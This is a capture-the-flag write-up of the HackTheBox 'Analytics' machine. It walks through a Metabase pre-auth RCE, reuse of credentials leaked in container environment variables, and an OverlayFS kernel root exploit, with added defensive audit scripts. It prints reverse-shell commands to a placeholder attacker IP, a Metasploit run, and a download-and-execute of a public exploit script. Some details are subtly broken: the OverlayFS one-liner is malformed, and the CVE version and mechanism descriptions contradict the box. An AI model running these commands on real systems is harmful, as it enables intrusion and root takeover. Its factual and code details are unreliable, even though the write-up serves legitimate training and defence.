HTB: Analytics Writeup


Machine Information

| Attribute    | Details       |
|--------------|---------------|
| Name         | Analytics     |
| OS           | Linux         |
| Difficulty   | Easy          |
| Points       | 20            |
| Release Date | N/A           |
| IP Address   | analytics.htb |
| Author       | HackTheBox    |

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

Analytics is an Easy-difficulty Linux machine running a Metabase data analytics platform vulnerable to pre-authentication RCE. The exploitation path involves discovering a subdomain hosting Metabase, exploiting CVE-2023-38646 for initial shell access within a Docker container, extracting host credentials from environment variables, lateral movement to the host via SSH, and finally privilege escalation through a Linux kernel OverlayFS vulnerability (CVE-2023-2640 + CVE-2023-32629).

TL;DR: Subdomain discovery → Metabase RCE → Docker escape via env vars → SSH lateral movement → Kernel exploit → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- analytics.htb

Results:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
80/tcp open http nginx 1.18.0

Service Enumeration

Hostname: analytics.htb

Update hosts file:

echo "10.10.14.36 analytics.htb" >> /etc/hosts

Visiting http://analytics.htb redirects to a login page rather than serving content directly, which points to a name-based virtual host configuration. Initial HTTP enumeration reveals that a Metabase instance is running.

Subdomain Discovery:

Attempting common subdomains revealed:

curl -H "Host: data.analytics.htb" http://analytics.htb

Discovered: data.analytics.htb — Metabase instance running on version 0.46.6 (vulnerable to CVE-2023-38646)

Update hosts file again:

echo "10.10.14.36 data.analytics.htb" >> /etc/hosts

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-38646 — Metabase pre-authentication RCE via setup-token in HTML source (Primary exploitation vector)
  • CVE-2023-2640 — Linux kernel OverlayFS privilege escalation (GameOver(lay))
  • CVE-2023-32629 — Linux kernel OverlayFS companion vulnerability for privilege escalation

Initial Foothold

Exploitation Path

CVE-2023-38646: Metabase Pre-Authentication RCE

Step 1: Locate Setup Token

Metabase embeds the setup-token in the HTML source of the application while the setup flow is still reachable. Examine the login page source:

curl -s http://data.analytics.htb | grep -i "token"

The setup-token is embedded in the page and can be extracted from the JavaScript configuration.
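The check described above, turned into a defender's self-test for their own Metabase deployment. This is an added example for this writeup, not Metabase's own code or the exploit script: it looks for the "setup-token" key in the bootstrap JSON Metabase embeds in its index page and in the unauthenticated /api/session/properties response (endpoint name taken from Metabase's public API). The sample bodies, the MetabaseBootstrap variable name in them and the token value are constructed.

```python
"""Self-check: does a Metabase instance hand its setup-token to unauthenticated clients?
Added example for this writeup, not Metabase's code. Sample bodies below are constructed."""
import re
import sys
import urllib.request

# Metabase setup tokens are UUID-shaped strings; a locked-down instance serialises the key as null,
# which this pattern deliberately does not match.
TOKEN_RE = re.compile(r'"setup-token"\s*:\s*"([0-9a-fA-F-]{36})"')


def find_setup_token(body: str):
    """Return the leaked setup-token from an HTML or JSON body, or None if absent or null."""
    match = TOKEN_RE.search(body)
    return match.group(1) if match else None


def exposure_report(index_html: str, session_props: str) -> dict:
    """Combine both unauthenticated sources into one verdict."""
    sources = {
        "index page": find_setup_token(index_html),
        "/api/session/properties": find_setup_token(session_props),
    }
    leaking = [name for name, token in sources.items() if token]
    return {
        "exposed": bool(leaking),
        "leaking_sources": leaking,
        # Any leak means the setup endpoint can be driven without a session;
        # the fix is to complete setup and upgrade to a patched Metabase release.
        "recommendation": (
            "setup-token reachable without auth: finish setup and upgrade Metabase"
            if leaking else "no setup-token visible to unauthenticated clients"
        ),
    }


def fetch(url: str, timeout: float = 10.0) -> str:
    """Plain GET returning the body as text (network is only used when run as a script)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_instance(base_url: str) -> dict:
    """Query a live instance you operate, e.g. http://localhost:3000."""
    base = base_url.rstrip("/")
    return exposure_report(fetch(base + "/"), fetch(base + "/api/session/properties"))


# Constructed sample bodies: one unpatched-style page that embeds a token, one response that does not.
SAMPLE_LEAKY_HTML = (
    '<script>window.MetabaseBootstrap = {"version":{"tag":"v0.46.6"},'
    '"setup-token":"11111111-2222-3333-4444-555555555555","site-name":"demo"};</script>'
)
SAMPLE_CLEAN_PROPS = '{"version":{"tag":"v0.46.6"},"setup-token":null,"site-name":"demo"}'

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    report = check_instance(target) if target else exposure_report(SAMPLE_LEAKY_HTML, SAMPLE_CLEAN_PROPS)
    print(report)
```

Run it with no arguments to see the verdict on the constructed samples, or pass the base URL of your own instance. A leaking index page is enough on its own: the token is the only secret the setup endpoint relies on, so exposure of either source counts as exposed.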

Step 2: Exploit CVE-2023-38646

Using a publicly available PoC script (e.g., CVE-2023-38646-Reverse-Shell.py from GitHub):

python3 CVE-2023-38646-Reverse-Shell.py -u http://data.analytics.htb -t <SETUP_TOKEN> -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Or using the Metasploit module for CVE-2023-38646:

msfconsole
use exploit/linux/http/metabase_rce
set RHOSTS data.analytics.htb
set LHOST <ATTACKER_IP>
set LPORT 4444
exploit

Step 3: Obtain Reverse Shell

Set up listener:

nc -nlvp 4444

After exploitation, you gain shell access as the metabase user running inside a Docker container.

Step 4: Confirm Container Environment

Check the environment and identify whether you are running as root inside the container:

id
whoami
env | grep -i password

The environment contains credentials for the host system, including the metalytics user password.


User Compromise

Lateral Movement: Docker Container to Host

Step 1: Extract Host Credentials from Environment

Inside the Docker container, environment variables contain host credentials set during container initialization:

env

Look for variables like:

  • MYSQL_ROOT_PASSWORD
  • POSTGRES_PASSWORD
  • Host user credentials

The metalytics user password is exposed in the environment variables.
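The leak this step relies on is easy to audit from the operator's side. The script below is an added example for this writeup, not part of the original notes: it reads env-style KEY=VALUE lines (or a running container process's /proc/<pid>/environ) and separates real credential values from the *_FILE indirections that only hold a path to a mounted secrets file. SAMPLE_ENV is constructed; it mirrors the META_* naming from this box but the password in it is a placeholder.

```python
"""Audit a process environment for credential-bearing variables.
Added example for this writeup, not from the original notes. SAMPLE_ENV is constructed."""
import re
from pathlib import Path

# Variable names that conventionally carry credentials (case-insensitive substring match).
SECRET_NAME_RE = re.compile(r"PASS(WORD)?|PWD|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)

# Constructed sample modelled on the writeup's META_* variables; every value is a placeholder.
SAMPLE_ENV = [
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/bin",
    "HOME=/home/metabase",
    "MB_DB_TYPE=h2",
    "META_USER=metalytics",
    "META_PASS=Placeholder-Passw0rd",
    "POSTGRES_PASSWORD_FILE=/run/secrets/pg_password",
    "API_TOKEN=",
]


def parse_env_lines(lines):
    """KEY=VALUE lines -> dict; lines without '=' are ignored."""
    env = {}
    for line in lines:
        if "=" in line:
            key, value = line.split("=", 1)
            env[key.strip()] = value
    return env


def read_proc_environ(pid):
    """Environment of a live process (NUL-separated); needs permission to read /proc/<pid>/environ."""
    raw = Path(f"/proc/{pid}/environ").read_bytes()
    return parse_env_lines(chunk.decode("utf-8", "replace") for chunk in raw.split(b"\0") if chunk)


def audit_env(env):
    """Return {name: verdict} for every credential-like variable in the environment."""
    verdicts = {}
    for name, value in env.items():
        if not SECRET_NAME_RE.search(name):
            continue
        if name.upper().endswith("_FILE"):
            verdicts[name] = "ok: indirection to a secrets file, the value is only a path"
        elif value == "":
            verdicts[name] = "ok: empty, nothing to steal"
        else:
            verdicts[name] = "LEAK: credential material readable by anyone with a shell or /proc access"
    return verdicts


if __name__ == "__main__":
    import sys
    env = read_proc_environ(int(sys.argv[1])) if len(sys.argv) > 1 else parse_env_lines(SAMPLE_ENV)
    for name, verdict in sorted(audit_env(env).items()):
        print(f"{name}: {verdict}")
```

Run without arguments to audit the constructed sample, or pass the PID of a container's main process (from the host, `docker inspect` gives it) to audit a live one. The defensive lesson from this box is two-fold: ship secrets via a file or secrets manager rather than the environment, and never give a container a credential that is also valid for SSH on the host, since any shell in the container then becomes a shell on the host.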

Step 2: SSH to Host

From the Docker container, SSH to the host machine using the extracted credentials:

ssh metalytics@analytics.htb
# or
ssh metalytics@<HOST_IP>

When prompted for the password, enter the one extracted from the environment variables.

Step 3: Verify User Access

Confirm successful lateral movement:

whoami
id
pwd

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

Check system information and kernel version:

uname -a
uname -r

The output shows kernel version 6.2.0-25-generic, which is vulnerable to the OverlayFS CVEs.
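For a defender checking a fleet, the kernel release on its own is only half the picture: the OverlayFS technique used later in this writeup starts with an unprivileged user namespace (`unshare -rm`), so whether unprivileged user namespaces are allowed decides if the mount step is even reachable. The script below is an added example for this writeup, not from the original notes. It parses the Ubuntu <version>-<abi>-<flavour> release string and reads two sysctls: the upstream user.max_user_namespaces and the Debian/Ubuntu-specific kernel.unprivileged_userns_clone (assumed present on the target distribution). The first patched ABI number is supplied by the operator from the vendor advisory rather than hardcoded.

```python
"""Report the host-side facts that govern OverlayFS-in-user-namespace privilege escalation:
kernel release and whether unprivileged user namespaces are permitted.
Added example for this writeup, not from the original notes."""
import re
from pathlib import Path

# Ubuntu layout: <major>.<minor>.<patch>-<abi>-<flavour>, e.g. 6.2.0-25-generic
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-([A-Za-z0-9_]+)$")


def parse_release(release):
    """'6.2.0-25-generic' -> (6, 2, 0, 25, 'generic')."""
    match = RELEASE_RE.match(release.strip())
    if not match:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi, flavour = match.groups()
    return int(major), int(minor), int(patch), int(abi), flavour


def read_sysctl(name, root="/proc/sys"):
    """Value of a sysctl as a string, or None when this kernel does not expose it."""
    try:
        return Path(root, *name.split(".")).read_text().strip()
    except OSError:
        return None


def assess(release, sysctls, fixed_abi=None):
    """Combine the kernel release and sysctl values into a report.
    sysctls: {name: value-or-None}; fixed_abi: first patched ABI for this series per the
    vendor advisory (operator-supplied; None means 'do not judge patch level')."""
    major, minor, patch, abi, flavour = parse_release(release)
    # Either setting at 0 stops a local user from creating the user namespace the technique needs.
    userns_blocked = (
        sysctls.get("user.max_user_namespaces") == "0"
        or sysctls.get("kernel.unprivileged_userns_clone") == "0"
    )
    notes = []
    if fixed_abi is not None:
        relation = "below" if abi < fixed_abi else "at or above"
        notes.append(f"kernel ABI {abi} is {relation} the fixed ABI {fixed_abi}")
    if userns_blocked:
        notes.append("unprivileged user namespaces disabled: unshare -rm based exploitation is blocked")
    else:
        notes.append("unprivileged user namespaces allowed: the OverlayFS mount step is reachable by any local user")
    return {
        "kernel": f"{major}.{minor}.{patch}-{abi}-{flavour}",
        "patched": None if fixed_abi is None else abi >= fixed_abi,
        "userns_blocked": userns_blocked,
        "notes": notes,
    }


def assess_local(fixed_abi=None):
    """Run the assessment against the machine this script executes on."""
    release = Path("/proc/sys/kernel/osrelease").read_text()
    names = ("user.max_user_namespaces", "kernel.unprivileged_userns_clone")
    return assess(release, {n: read_sysctl(n) for n in names}, fixed_abi)


if __name__ == "__main__":
    import json
    print(json.dumps(assess_local(), indent=2))
```

Restricting user namespaces is a blunt mitigation (container runtimes and some browsers rely on them), so the durable fix is the vendor kernel update; the sysctl check is there to tell you how exposed an unpatched host is in the meantime.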

Check sudo privileges:

sudo -l

Check for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Run privilege escalation enumeration script:

./linpeas.sh

Exploitation (Root): CVE-2023-2640 + CVE-2023-32629 OverlayFS

The GameOver(lay) vulnerability affects Linux kernels with the OverlayFS module; this system is vulnerable because of its kernel version.

One-liner exploit:

unshare -rm sh -c "mkdir -p /tmp/x/w m m && mount -t overlay overlay -o lowerdir=/tmp/x/w:/,upperdir=/tmp/x/m,workdir=/tmp/x/m /tmp/x/o && /tmp/x/o/bin/bash -sip /bin/bash -i >& /dev/tcp/<ATTACKER_IP>/5555 0>&1 || echo 'Exploit failed'"

Alternatively, use the publicly available exploit script for CVE-2023-2640:

# Download and run the GameOverlay exploit
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
chmod +x exploit.sh
./exploit.sh

After running the exploit, you should have a root shell.

Verify root access:

whoami
id

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance<br/>Port scan, subdomain discovery"] --> B["Identify Metabase<br/>data.analytics.htb on port 80"]
B --> C["Extract Setup Token<br/>from HTML source"]
C --> D["Exploit CVE-2023-38646<br/>Metabase pre-auth RCE"]
D --> E["Reverse shell<br/>as metabase in Docker"]
E --> F["Extract host credentials<br/>from environment variables"]
F --> G["SSH lateral movement<br/>to host as metalytics user"]
G --> H["Enumerate kernel version<br/>6.2.0-25-generic"]
H --> I["Exploit CVE-2023-2640 + CVE-2023-32629<br/>OverlayFS GameOver(lay)"]
I --> J["Privilege Escalation to root"]
J --> K["Capture root flag"]

Tools Used

| Tool         | Purpose                                             |
|--------------|-----------------------------------------------------|
| nmap         | Port scanning and service discovery                 |
| curl         | HTTP requests and subdomain testing                 |
| nc / netcat  | Reverse shell listener                              |
| ssh          | SSH client for lateral movement to host             |
| python3      | Exploit script execution                            |
| metasploit   | Exploitation framework (CVE-2023-38646 module)      |
| linpeas      | Linux privilege escalation enumeration              |
| wget         | File transfer for exploit scripts                   |
| env          | Environment variable extraction                     |
| uname        | System and kernel information                       |
| whoami / id  | User and privilege verification                     |

Vulnerability Reference

| # | Vulnerability  | Component                | Severity | Impact                                              |
|---|----------------|--------------------------|----------|-----------------------------------------------------|
| 1 | CVE-2023-38646 | Metabase                 | Critical | Pre-authentication RCE via exposed setup-token       |
| 2 | CVE-2023-2640  | Linux Kernel (OverlayFS) | High     | Local privilege escalation to root                  |
| 3 | CVE-2023-32629 | Linux Kernel (OverlayFS) | High     | Companion CVE for OverlayFS privilege escalation    |

Details:

  • CVE-2023-38646: Metabase versions before 0.46.6 and 0.45.x before 0.45.3 do not properly validate the setup-token, allowing unauthenticated users to execute arbitrary code on the server. The setup endpoint is accessible without authentication if the token is known or can be extracted from the page source.

  • CVE-2023-2640 & CVE-2023-32629: The GameOver(lay) vulnerability affects Linux kernels with OverlayFS. These CVEs allow unprivileged users to gain root privileges through a race condition in the OverlayFS module. Ubuntu kernels up to and including version 6.2.0 are vulnerable.


Key Learnings

  1. Subdomain Enumeration Matters: Simple DNS/Host header modification revealed the Metabase instance. Many attacks begin with thorough subdomain discovery.

  2. Container Escapes via Environment Variables: Docker containers often leak host credentials through environment variables. Always extract and examine env output when gaining initial shell access.

  3. Exposed Setup/Configuration Interfaces: Admin panels and setup pages should never be publicly accessible post-deployment. The Metabase setup-token in HTML source was a critical oversight.

  4. Kernel Version Enumeration: Always check kernel version (uname -r) — it’s one of the easiest ways to identify privilege escalation vectors. The OverlayFS vulnerability affected specific kernel versions.

  5. Lateral Movement Before Privilege Escalation: Rather than attempting local escalation in a Docker container with limited tools, exiting to the host via SSH credentials (found in env vars) provided a stable platform for exploitation.

  6. CVE Chaining: The attack chain demonstrated vulnerability chaining: RCE → Container Escape → Lateral Movement → Kernel Exploit → Root. Each stage depended on proper enumeration of the previous stage.


Author

HackTheBox Community & Security Researchers

Original writeup compiled from attack notes and public CVE documentation.


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting security assessments or penetration testing.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-38646 #CVE-2023-2640 #CVE-2023-32629 #Metabase #OverlayFS #Docker #RCE